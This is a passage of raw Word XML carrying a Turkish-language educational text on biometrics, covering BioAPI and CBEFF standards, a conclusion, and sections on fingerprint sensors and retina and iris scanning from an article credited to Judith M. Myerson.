    <w:p w:rsidR="00E77DF4" w:rsidRPr="00385665" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385665">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biyometrik standartlar (Biometric Standards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00802E3A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometrik ekipman ve sistemler geliştiren veya pazarlayan 200'den fazla satıcı var. Bu kadar çok farklı ürünün ve özelliklerin bulunduğu diğer tüm endüstrilerde olduğu gibi, bu, biyometrik ürünler ve ölçüm için sayısız “standart” olduğu ve biyometrik bilgilerin depolanması, alınması ve işlenmesi gibi birçok yöntem olduğu bir duruma yol açmıştır. Durumu düzeltmek ve ürün ve sistemleri birbiriyle daha uyumlu hale getirmek için, biyometrik arayüzleri ve işlemleri standart hale getirmek için çeşitli çabalar sarf edilmişt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802E3A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>En büyük çaba Biyometrik Uygulama Programı Arabirimi veya BioAPI'dir. Biyometrik sistemleri ve uygulamaları geliştiren 90'dan fazla kuruluştan oluşan bir grup olan BioAPI Konsorsiyumu, BioAPI'yi geliştirdi. BioAPI, çok çeşitli biyometrik teknolojilerle standart bir arayüz oluşturma uygulamaları sunar. Geliştiriciler BioAPI kullanarak, biyometrik sistemlerini teknolojiden bağımsız ve platformdan bağımsız bir şekilde bütünleştirebilirler. Örneğin, parmak tarama donanımı geliştiricileri, her ikisi de BioAPI spesifikasyonunu takip ettiği sürece sistemlerini herhangi bir bilgi işlem platformuyla bütünleştirebilecekler. BioAPI spesifikasyonu şu anda sürüm 1.1'dedir ve kamuya açıklanmıştır. Geliştiricilerin ürünlerini modellemek ve test etmek için kullanmaları için bir açık kaynak referans uygulaması da mevcuttu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05696F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BioAPI, biyometrik teknoloji arayüzlerinin standardizasyonunu ele alırken, Ortak Biyometrik Değişim Dosya Formatı veya CBEFF, biyometrik şablonların depolanması ve değişimi için ortak bir format tanımlanması ile ilgilidir. Çok sık, biyometrik uygulamalar veri depolama için kendi tescilli veya platforma özel formatlarını kullanır. Ne yazık ki, bu biyometrik verilerin uygulamalar veya platformlar arasında aktarılmasını zorlaştırıyor. CBEFF, sistemler ve uygulamalar arasında biyometrik şablonların depolanması ve değişimi için platformdan bağımsız ve biyometrik bağımsız bir format tanımlayarak bu konuyu ele almaktadır. CBEFF, Ulusal Standartlar ve Teknoloji Enstitüsü (NIST) tarafından desteklenmektedir ve kullanışlı bir standart olarak geniş destek almaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00385665" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385665">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sonuç (Conclusion)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001C110C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051797D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Biyometrik teknolojinin kullanımının sınıflandırılmış askeri tesisler ve bilim kurgu filmleriyle sınırlı olduğu bir zaman vardı. Bir kişiyi tanımlamak, doğrulamak ve takip etmek için biyolojik özellikleri kullanma kavramı, “normal” kişilerin düşünmesi için çok ileri görünüyordu. Ancak, gün artık biyometriklerin günlük kullanımının mümkün olmadığı, her yerde yaşanıyor: ofis binalarında ve süpermarketlerde, bilgisayar ağlarında ve bankalarda, sokak köşelerinde ve futbol stadyumlarında. Maliyetin düşmesi ve fizibilite ve güvenilirlikteki büyük kazanımlar, sistem sahipleri ve güvenlik uzmanlarını, geleneksel kullanıcı tanımlama ve doğrulama sistemlerine ek olarak veya hatta bunun yerine, biyometri kullanımını düşünmeye zorladı. Son kullanıcılar bile günlük yaşamlarında biyometriyi kabullenmeye başlamıştır ve bu eğilim sadece geleceğe devam edecektir. Klavyelerin, parolaları değiştirmek için yerleşik parmak izi okuyucusuna sahip olacağı günler çok uzak değildir, ATM makineleri </w:t>
      </w:r>
      <w:r w:rsidRPr="0051797D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PIN'ler yerine iris taramaları kullanacak ve el tarayıcıları ofisteki kimlik kartlarının yerini alacaktır. Gelecek ne olursa olsun, kesin olan bir şey var: biyometri kalmak ve daha popüler olmak için burada. Başarılı (ve bilgili) güvenlik uzmanları, biyometrik teknolojiyi sürekli büyüyen güvenlik araçlarının bir parçası olarak planlamayı, uygulamayı ve kullanmayı öğrenmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385665">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BİYOMETRİK: YENİ OLAN NEDİR?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00385665" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385665">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Judith M. Myerson</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00385665" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="131E72EB" wp14:editId="122B50B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>24130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>217170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5753100" cy="16478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5753100" cy="1647825"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00385665">
                              <w:t xml:space="preserve">Yıllar boyunca, ağ dünyasında güvenlik, birinin bir şifresini, PIN'ini veya birinin annesinin kızlık soyadı gibi kişisel bir bilgisini bildiği şeylere dayanıyordu. Bu, birinin (bir kart anahtarı, akıllı kart veya belirteç) sahip olduğu şeyle kullanabileceği (biyometrik) bir şeyle desteklenmektedir. Biyometri, bir kişiyi parmak ucu, göz ve yüz özelliklerine </w:t>
                            </w:r>
                            <w:r>
                              <w:t>göre ölçer. Biri ayrıca tuşları</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00385665">
                              <w:t xml:space="preserve"> nasıl k</w:t>
                            </w:r>
                            <w:r>
                              <w:t>ullandığı</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00385665">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>,konuşma şekli</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00385665">
                              <w:t xml:space="preserve"> ve birinin nasıl yürüdüğü ile de ölçülür. Gelecekteki bir tarihte, bir kişinin kulağının oluşma şekline ve birinin nasıl işitdiğine bakılabilir. Geleneksel biyometrik sistemlere ve daha sonra yeni teknolojilere ve sistemlere bakın. Bunları standardizasyon sorunları ve seçim kriterleri üzerine kısa tartışmalar izle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72EB" id="Metin Kutusu 4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1.9pt;margin-top:17.1pt;width:453pt;height:1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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00385665">
                        <w:t xml:space="preserve">Yıllar boyunca, ağ dünyasında güvenlik, birinin bir şifresini, PIN'ini veya birinin annesinin kızlık soyadı gibi kişisel bir bilgisini bildiği şeylere dayanıyordu. Bu, birinin (bir kart anahtarı, akıllı kart veya belirteç) sahip olduğu şeyle kullanabileceği (biyometrik) bir şeyle desteklenmektedir. Biyometri, bir kişiyi parmak ucu, göz ve yüz özelliklerine </w:t>
                      </w:r>
                      <w:r>
                        <w:t>göre ölçer. Biri ayrıca tuşları</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00385665">
                        <w:t xml:space="preserve"> nasıl k</w:t>
                      </w:r>
                      <w:r>
                        <w:t>ullandığı</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00385665">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>,konuşma şekli</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00385665">
                        <w:t xml:space="preserve"> ve birinin nasıl yürüdüğü ile de ölçülür. Gelecekteki bir tarihte, bir kişinin kulağının oluşma şekline ve birinin nasıl işitdiğine bakılabilir. Geleneksel biyometrik sistemlere ve daha sonra yeni teknolojilere ve sistemlere bakın. Bunları standardizasyon sorunları ve seçim kriterleri üzerine kısa tartışmalar izlemektedir.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F16EF7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F16EF7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F16EF7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F16EF7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16EF7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Parmak izleri (Fingerprints)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Birkaç yıl içinde, parmak izi şablonlarının basılı kopyalarını almak için siya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h mürekkep pedleri (</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>black ink pads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) kullanmak</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> geçmişte kaldı. Kişinin en çılgın hayallerinin ötesinde şeyler yapmasına izin veren parmak izi sensörleri yaşını girin. Uzak bir ağ sistemine erişmek için sensör çipinde - hızlı ve temiz - bir parmak ucunu kaydırın. İki parmak izi aynı olmadığından, birinin parmak izlerinin kopyalanması zor olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir parmak izi parmak ucunda bulunan desenlerden oluşur. İyi bir desen, parmak izi endekslerinde minutiye olarak bilinen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sonlanma </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bölünmelerde</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3534">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n oluşur. Ortalama bir parmak izinde 40 ila 60 minutia vardır. Kalıplar kabul edilebilir bir minutia aralığında olsa bile, sensörler bir parmak ucunun tüm detaylarını yakalayamayabilir. Bazı kişiler için, klavyede günlük yazma veya piyanoda zor klasik müzik parçalarının çalınması nedeniyle desenler çok ince olabilir. Ek olarak, eğer bir birey genetik bir kusur ile doğarsa veya parmak ucunda büyük bir yara izi varsa, desenleri okumak zor olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6100">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir parmak ucunun kalıplarını kayıtlı bir parmak izi şablonunun kalıplarıyla eşleştirmenin dört yolu vardır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6100">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elektriksel, t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ermal, optik ve karma sensörler</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6100">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bir elektrik sensörü, parmak izinin sırtları ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olukları</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6100">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> arasındaki değişken elektriksel alan gücünü ölçer.</w:t>
      </w:r>
      <w:r w:rsidRPr="000478CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000478CA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir termal sensör, parmakla kaydırma iş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">leminde sıcaklık farkını ölçer, </w:t>
      </w:r>
      <w:r w:rsidRPr="000478CA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sırtların sürtünmesi,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>merkez</w:t>
      </w:r>
      <w:r w:rsidRPr="000478CA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yüzeyi boyunca kayarken, temas etmeyen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oluklardan </w:t>
      </w:r>
      <w:r w:rsidRPr="000478CA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha fazla ısı üretir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Göz tarama (Eye Scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir parmak ucunun aksine, göz yapısı üzerinde binlerce minutia sağlayabilir. Parmak ucu minutileri, harici bir yapının şekli hakkında bilgi verirken, göz minutesi, gözün iç yapısının düzenine bakar. Bir kişi bu bilgiyi iki kaynaktan elde edebilir: retina ve iris tarama sistemleri. Birincisi retinadaki damarların </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şablonu</w:t>
      </w:r>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ile ilgilidir, ikincisi ise irisde liflerin, dokuların ve halkaların </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şablonunu</w:t>
      </w:r>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Retinanın benzersiz desenlerini taramak için retina tarayıcı, optik bir kuplör aracılığıyla düşük yoğunluklu bir ışık kaynağı kullanır. Böyle bir tarayıcı, birinin bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00625E58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prize bakmasını ve belirli bir noktaya odaklanmasını gerektirir. Bu, düzeltici lens kullanan veya okuma cihazıyla yakın temasta rahat hissetmeyen kişiler hakkındaki endişeleri ortaya çıkarı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F51E98">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İris taraması, diğer taraftan, oldukça geleneksel bir TV kamera elemanı kullanır ve yakın temas gerektirmez. İris biyometrisi, bir ışık kaynağı iyi iken düzeltici gözlük ve kontaklarla iyi çalışır. Bazı havayolları gezginleri uçaklara kabul etme sürecini hızlandırmak için iris tarayıcıları kurmuştur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175856">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Göz kalıplarının hastalık veya yaralanma nedeniyle zaman içerisinde değişebileceğini unutmayın. Göz tarayıcıları insanları kör etmek için işe yaramaz. Bu görme engelli bireyler, özellikle retina hasarı olanlar için de geçerlidir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
